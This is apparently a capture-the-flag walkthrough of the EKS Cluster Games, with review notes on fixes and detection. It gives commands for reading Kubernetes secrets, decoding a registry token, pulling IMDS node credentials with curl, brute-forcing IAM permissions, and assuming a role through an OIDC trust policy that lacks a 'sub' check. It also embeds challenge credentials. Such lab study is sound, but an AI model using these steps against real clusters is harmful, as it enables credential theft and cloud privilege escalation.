CTF Link: https://eksclustergames.com/
Challenge 1 – Secret Seeker
# Show which identity this shell authenticates as, then list every verb/resource
# pair that identity is allowed to use.
kubectl whoami
kubectl auth can-i --list
# List the Secrets in the current namespace, then dump one of them in full.
# Values under .data in a Secret are base64-encoded, not encrypted, so "get" on
# secrets is enough to read their contents.
# NOTE(review): grant get/list on secrets only to identities that need it; a
# broad grant is what makes this step possible.
kubectl get secrets
kubectl get secret log-rotate -o json
Challenge 2 – Registry Hunt
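# Check the current identity and its permissions, then look at the running pods.
kubectl whoami
kubectl auth can-i --list
kubectl get pods
# Pod found: database-pod-2c9b3a4e
kubectl get pod database-pod-2c9b3a4e -o yaml
# Image pull secret named in the pod YAML (presumably under imagePullSecrets):
# registry-pull-secrets-780bab1d
kubectl get secret registry-pull-secrets-780bab1d -o yaml
# Decoded registry credential (username:token):
# eksclustergames:dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo
# The token is fed on stdin instead of with -p so that it does not show up in the
# process list; printf is a shell builtin, so no extra process carries it in argv.
printf '%s' 'dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo' \
  | crane auth login docker.io -u eksclustergames --password-stdin
# Save the private image as a tarball for offline inspection.
# NOTE(review): a pull secret readable by a low-privilege identity hands out
# registry access; scope such tokens to read-only on the repositories the pod needs.
crane pull docker.io/eksclustergames/base_ext_image:latest base_ext_image.tar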
Extract this .tar file to get the flag.
Challenge 3 – Image Inquisition
# Check the current identity and its permissions inside the cluster.
kubectl whoami
kubectl auth can-i --list
# Ask the EC2 instance metadata service (IMDS) for the node instance role's
# temporary credentials. No session-token header is sent, i.e. this is an
# IMDSv1-style request.
# NOTE(review): this only works because the pod can reach the node's IMDS.
# Requiring IMDSv2 with a hop limit of 1, or blocking pod egress to
# 169.254.169.254, closes this path for pods that do not use host networking.
curl 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole
# Store the returned values in the AWS CLI configuration; the YOUR_* words are
# placeholders for the fields of the JSON returned above.
aws configure set aws_access_key_id YOUR_ACCESS_KEY
aws configure set aws_secret_access_key YOUR_SECRET_KEY
aws configure set aws_session_token YOUR_SESSION_TOKEN
Brute-forcing IAM permissions:
# Probe which API calls these credentials are allowed to make.
# The ASIA key prefix together with the session token marks these as temporary
# STS credentials, so they stop working once the session expires.
# NOTE(review): the keys are passed as command-line arguments, which exposes them
# in the process list and in shell history.
# Detection: permission brute-forcing typically shows up in CloudTrail as a burst
# of calls across many services from one principal, most of them denied.
python3 enumerate-iam.py --access-key ASIA2AVYNEVMXO6Y46WN --secret-key B8cOWwImjKrTZLQKeZK03DXk+tqKzel9L1RUzljg --session-token FwoGZXIvYXdzEPv//////////wEaDC+QPYtuCp1i7X2JGSK3AZce7+VHqwtXmBlMY42U8rrleP8W3Rlaht6iH/eZfWSZ5ZRucxeD/zzvuD0yWNzZ33kdrXC3Js3dkYchAo+jHLzR+Q26w9YB3XvOBud9urax1MbADvWPHfOLmpW/2xIEU6WnxU6Do5ELNk/+ElHQM4go4rqUgzS/7JuQ3SgF4+S2I6t4HBfuT1idlhV+wvUnYolzi9NKGrbrdXckfczwOoi8HnNe1Cf/w24pWtxMugh0eRGA4mehLSj9xb6uBjItePUoK+Ds2Ybu5fFeGAgaU0CWk3hkvCq7tCl4eBt7Re4YjM37P/1Sqv2kaakJ
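# List the ECR repositories visible to the node role and fetch a registry
# authorization token.
aws ecr describe-repositories --region us-west-1
aws ecr get-authorization-token --region us-west-1
# Log Docker in to the registry. The password is piped on stdin instead of being
# given with -p, so it never appears in the process list or in shell history.
aws ecr get-login-password --region us-west-1 \
  | docker login --username AWS --password-stdin 688655246681.dkr.ecr.us-west-1.amazonaws.com
aws ecr list-images --repository-name central_repo-aaf4a7c --region us-west-1
# --no-trunc prints the full command that created each layer.
# NOTE(review): anything placed in a build command or build argument stays
# readable in the image history for anyone who can pull the image; keep secrets
# out of image layers. Presumably this is where the flag shows up.
docker history 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c:374f28d8-container --no-trunc
# Browse the layers interactively; <image id> is a placeholder.
dive <image id>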
Challenge 4 – Pod break
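# Check the current identity and its permissions inside the cluster.
kubectl whoami
kubectl auth can-i --list
# No interesting permissions found
cat .kube/config
# The node's instance metadata service is reachable from the pod, so the node
# instance role's temporary credentials can be read from it.
# NOTE(review): requiring IMDSv2 with a hop limit of 1, or blocking pod egress to
# 169.254.169.254, removes this path.
curl 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole
aws ecr describe-repositories --region us-west-1
# First attempt with the name localcfg (presumably taken from .kube/config).
aws eks get-token --cluster-name localcfg
# Mint a cluster token with the node role's credentials. jq -r prints the raw
# string, so no sed step is needed to strip the JSON quotes.
token=$(aws eks get-token --cluster-name eks-challenge-cluster | jq -r '.status.token')
kubectl --token="$token" get pods
aws eks get-token --cluster-name eks-challenge-cluster
# We guessed the cluster name from get-caller-identity output (the node role name
# used in the curl request above starts with eks-challenge-cluster).
# With the node's identity, list what it may do and read the secrets it can reach.
kubectl auth can-i --list --token="$token"
kubectl get secrets --token="$token"
kubectl get secrets -o json --token="$token"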
namespace: challenge4
Guessing the cluster name: it was inferred from the get-caller-identity output, as noted above.
Challenge 5 – Container Secrets Infrastructure
Permissions
{
"secrets": [
"get",
"list"
],
"serviceaccounts": [
"get",
"list"
],
"pods": [
"get",
"list"
],
"serviceaccounts/token": [
"create"
]
}
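Trust Policy (the only condition is on the token audience, `aud`; there is no `sub` condition tying the role to one service account)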
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
}
}
}
]
}
IAM Policy
{
"Policy": {
"Statement": [
{
"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": [
"arn:aws:s3:::challenge-flag-bucket-3ff1ae2",
"arn:aws:s3:::challenge-flag-bucket-3ff1ae2/flag"
]
}
],
"Version": "2012-10-17"
}
}
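# Similar approach to the last challenge: mint a cluster token with the node
# role's credentials and keep it in a variable instead of pasting it around.
token=$(aws eks get-token --cluster-name eks-challenge-cluster | jq -r '.status.token')
kubectl get sa --token="$token"
kubectl get sa s3access-sa -ojson --token="$token"
# The identity may create service account tokens (serviceaccounts/token: create),
# so it can request one for debug-sa with the audience that STS expects.
web_identity_token=$(kubectl create token debug-sa --token="$token" --audience sts.amazonaws.com)
# The role's trust policy checks only the aud claim, so a token issued for any
# service account of this cluster with that audience is accepted.
# NOTE(review): the fix is a StringEquals condition on the provider's :sub claim,
# e.g. system:serviceaccount:<namespace>:<service-account>, next to the aud check.
aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --role-session-name s3access-sa --web-identity-token "$web_identity_token"
aws s3 cp s3://challenge-flag-bucket-3ff1ae2/flag ./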
Thanks for reading!!
https://medium.com/@jason133337/eks-cluster-game-challenge-walkthrough-9110343c24ce